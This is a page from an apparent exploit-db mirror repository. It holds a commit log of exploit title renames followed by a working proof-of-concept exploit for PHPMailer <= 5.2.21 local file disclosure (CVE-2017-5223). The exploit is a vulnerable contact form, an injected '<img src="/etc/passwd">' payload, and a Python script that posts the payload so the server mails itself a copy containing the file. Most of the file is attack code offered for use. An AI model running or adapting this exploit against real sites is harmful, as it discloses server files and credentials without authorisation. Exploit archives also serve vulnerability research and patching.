bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/43056.py
Offensive Security 0fcc4af85c DB: 2017-12-23 
5 changes to exploits/shellcodes

Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)

Broadcom BCM4325 and BCM4329 Devices - Denial of Service
Broadcom BCM4325 / BCM4329 Devices - Denial of Service

Armadito Antimalware - Backdoor/Bypass
Armadito Antimalware - Backdoor Access/Bypass

Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Local Stack Buffer Overflow
Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow

Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1  - 'set_dp_control_port' Lack of Locking Use-After-Free
Apple macOS 10.12 16A323 XNU Kernel / iOS 10.1.1 - 'set_dp_control_port' Lack of Locking Use-After-Free

PHPMailer < 5.2.21 - Local File Disclosure

MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor
MODACOM URoad-5000 1450 - Remote Command Execution / Backdoor Access

Cisco IOS 12.2 < 12.4 /  15.0 < 15.6 - Security Association Negotiation Request Device Memory
Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor
Netcore / Netis Routers - UDP Backdoor
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access
Netcore / Netis Routers - UDP Backdoor Access
Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control

Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)
Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)

Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor
Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor Access

MyBB 1.6.4 - Backdoor (Metasploit)
MyBB 1.6.4 - Backdoor Access (Metasploit)

8 TOTOLINK Router Models - Backdoor / Remote Code Execution
8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution

PHPMailer < 5.2.21 - Local File Disclosure
2017-12-23 05:02:17 +00:00

65 lines
No EOL
2.3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
// PoC //
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
// vulnerable form example //
<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>
// exploit //
Put <img src="/etc/passwd"> in the message (or other file to disclose).
// python code //
#!/usr/bin/python
import urllib
import urllib2
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html
Reference in a new issue View git blame Copy permalink